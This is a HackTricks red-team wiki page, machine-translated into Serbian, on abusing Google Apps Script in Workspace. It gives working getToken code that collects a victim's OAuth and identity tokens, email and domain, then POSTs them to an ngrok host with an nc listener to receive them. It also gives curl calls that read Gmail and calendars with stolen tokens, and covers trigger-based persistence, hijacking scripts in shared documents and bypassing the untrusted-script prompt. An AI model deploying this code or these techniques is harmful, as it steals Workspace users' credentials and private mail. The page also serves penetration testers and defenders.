GWS - App Scripts

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

App Scripts

App Scripts je kod koji će se aktivirati kada korisnik sa dozvolom za uređivanje pristupi dokumentu sa kojim je povezan App Script i nakon prihvatanja OAuth prompta. Takođe se mogu postaviti da se izvršavaju svakog određenog vremena od strane vlasnika App Script-a (Persistencija).

Create App Script

Postoji nekoliko načina za kreiranje App Script-a, iako su najčešći iz Google dokumenta (bilo koje vrste) i kao samostalni projekat:

Create a container-bound project from Google Docs, Sheets, or Slides

Otvorite dokument u Docs, tabelu u Sheets ili prezentaciju u Slides.
Kliknite na Extensions > Google Apps Script.
U editoru skripti, kliknite na Untitled project.
Dajte svom projektu ime i kliknite na Rename.

Create a standalone project

Da biste kreirali samostalni projekat iz Apps Script-a:

Idite na script.google.com.
Kliknite na New Project.
U editoru skripti, kliknite na Untitled project.
Dajte svom projektu ime i kliknite na Rename.

Create a standalone project from Google Drive

Otvorite Google Drive.
Kliknite na New > More > Google Apps Script.

Create a container-bound project from Google Forms

Otvorite obrazac u Google Forms.
Kliknite na More more_vert > Script editor.
U editoru skripti, kliknite na Untitled project.
Dajte svom projektu ime i kliknite na Rename.

Create a standalone project using the clasp command line tool

clasp je alat za komandnu liniju koji vam omogućava da kreirate, preuzimate/podignete i implementirate Apps Script projekte iz terminala.

Pogledajte Command Line Interface using clasp guide za više detalja.

App Script Scenario

Create Google Sheet with App Script

Počnite tako što ćete kreirati App Script, moja preporuka za ovaj scenario je da kreirate Google Sheet i idete na Extensions > App Scripts, ovo će otvoriti novi App Script za vas povezan sa tabelom.

Leak token

Da biste omogućili pristup OAuth tokenu, potrebno je da kliknete na Services + i dodate opsege kao što su:

AdminDirectory: Pristup korisnicima i grupama direktorijuma (ako korisnik ima dovoljno dozvola)
Gmail: Da biste pristupili podacima iz gmail-a
Drive: Da biste pristupili podacima iz drive-a
Google Sheets API: Da bi radilo sa okidačem

Da biste promenili potrebne opsege, možete otići na podešavanja projekta i omogućiti: Show "appsscript.json" manifest file in editor.

function getToken() {
var userEmail = Session.getActiveUser().getEmail();
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1);
var oauthToken = ScriptApp.getOAuthToken();
var identityToken = ScriptApp.getIdentityToken();

// Data json
data = {
"oauthToken": oauthToken,
"identityToken": identityToken,
"email": userEmail,
"domain": domain
}

// Send data
makePostRequest(data);

// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions

// To ask for AdminDirectory permissions
var pageToken = "";
page = AdminDirectory.Users.list({
domain: domain,  // Use the extracted domain
orderBy: 'givenName',
maxResults: 100,
pageToken: pageToken
});

// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10);

// To ask for drive permissions
var files = DriveApp.getFiles();
}


function makePostRequest(data) {
var url = 'http://5.tcp.eu.ngrok.io:12027';

var options = {
'method' : 'post',
'contentType': 'application/json',
'payload' : JSON.stringify(data)
};

try {
UrlFetchApp.fetch(url, options);
} catch (e) {
Logger.log("Error making POST request: " + e.toString());
}
}

Da biste uhvatili zahtev, jednostavno možete pokrenuti:

ngrok tcp 4444
nc -lv 4444 #macOS

Permissions requested to execute the App Script:

Kada se izvrši spoljni zahtev, OAuth prompt će takođe tražiti dozvolu za pristup spoljnim krajnjim tačkama.

Create Trigger

Kada se aplikacija pročita, kliknite na ⏰ Triggers da kreirate okidač. Kao funkciju izaberite getToken, pokreće se na implementaciji Head, u izvoru događaja izaberite From spreadsheet i tip događaja izaberite On open ili On edit (u zavisnosti od vaših potreba) i sačuvajte.

Napomena: možete proveriti izvršenja App Scripts u tabu Executions ako želite da debagujete nešto.

Da bi se pokrenuo App Script, žrtva treba da se poveže sa Editor Access.

Token koji se koristi za izvršenje App Script biće onaj od kreatora okidača, čak i ako je datoteka otvorena kao Editor od strane drugih korisnika.

Abusing Shared With Me documents

Ako je neko podelio sa vama dokument sa App Scripts i okidačem koristeći Head App Script-a (ne fiksnu implementaciju), možete modifikovati kod App Script-a (dodajući, na primer, funkcije za krađu tokena), pristupiti mu, i App Script će biti izvršen sa dozvolama korisnika koji je podelio dokument sa vama! (napomena: OAuth token vlasnika će imati pristupne opsege one koje su date kada je okidač kreiran).

Obaveštenje će biti poslato kreatoru skripte koje ukazuje da je neko modifikovao skriptu (Šta mislite o korišćenju gmail dozvola za generisanje filtera kako bi se sprečila upozorenja?)

Ako napadač modifikuje opsege App Script-a, ažuriranja neće biti primenjena na dokument dok se ne kreira novi okidač sa izmenama. Stoga, napadač neće moći da ukrade token vlasnika kreatora sa više opsega nego što je postavio u okidaču koji je kreirao.

Kada kreirate link za deljenje dokumenta, kreira se link sličan ovom: https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit Ako promenite završetak "/edit" u "/copy", umesto da mu pristupite, google će vas pitati da li želite da generišete kopiju dokumenta:

Ako korisnik kopira i pristupi, i sadržaj dokumenta i App Scripts će biti kopirani, međutim okidači nisu, stoga ništa neće biti izvršeno.

Napomena: takođe je moguće podeliti App Script kao Web aplikaciju (u Editoru App Script-a, implementirati kao Web aplikaciju), ali će se pojaviti upozorenje poput ovog:

Praćeno tipičnim OAuth promptom koji traži potrebne dozvole.

Testing

Možete testirati prikupljeni token za listanje emailova sa:

curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"

Lista kalendara korisnika:

curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"

App Script kao Persistencija

Jedna opcija za persistenciju bi bila da napravite dokument i dodate okidač za funkciju getToken i podelite dokument sa napadačem tako da svaki put kada napadač otvori datoteku, on izvlači token žrtve.

Takođe je moguće napraviti App Script i postaviti ga da se aktivira svakih X vremena (kao što je svaka minuta, sat, dan...). Napadač koji je kompromitovao akreditive ili sesiju žrtve mogao bi postaviti vremenski okidač za App Script i svaki dan izliti veoma privilegovan OAuth token:

Jednostavno napravite App Script, idite na Okidače, kliknite na Dodaj Okidač, i izaberite kao izvor događaja Vremenski okidač i izaberite opcije koje vam najbolje odgovaraju:

Ovo će kreirati email obaveštenje o bezbednosti i push poruku na vašem mobilnom uređaju koja vas obaveštava o tome.

Zaobilaženje Nepoverljivog Upita za Deljeni Dokument

Štaviše, ako vam je neko podelio dokument sa pristupom za uređivanje, možete generisati App Scripts unutar dokumenta i VLASNIK (kreator) dokumenta će biti vlasnik App Script-a.

To znači da će se kreator dokumenta pojaviti kao kreator bilo kog App Script-a koji bilo ko sa pristupom za uređivanje kreira unutar njega.

To takođe znači da će App Script biti poveren od strane Workspace okruženja kreatora dokumenta.

To takođe znači da ako je App Script već postojao i ljudi su dali pristup, bilo ko sa pristupom za uređivanje na dokumentu može modifikovati i zloupotrebiti taj pristup. Da biste zloupotrebili ovo, takođe vam je potrebno da ljudi aktiviraju App Script. Jedan pametan trik je da objavite skriptu kao web aplikaciju. Kada ljudi koji su već dali pristup App Script-u pristupe web stranici, oni će aktivirati App Script (ovo takođe funkcioniše koristeći <img> tagove).

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousGWS - Google Platforms Phishing NextAWS Pentesting

Last updated 3 days ago

App Scripts

Create App Script

App Script Scenario

Create Google Sheet with App Script

Leak token

Create Trigger

Sharing

Abusing Shared With Me documents

Copying instead of sharing

Sharing as Web Application

Testing

App Script kao Persistencija

Zaobilaženje Nepoverljivog Upita za Deljeni Dokument

App Scripts

Create App Script

App Script Scenario

Create Google Sheet with App Script

Leak token

Create Trigger

Sharing

Abusing Shared With Me documents

Copying instead of sharing

Sharing as Web Application

Testing

App Script kao Persistencija

Zaobilaženje Nepoverljivog Upita za Deljeni Dokument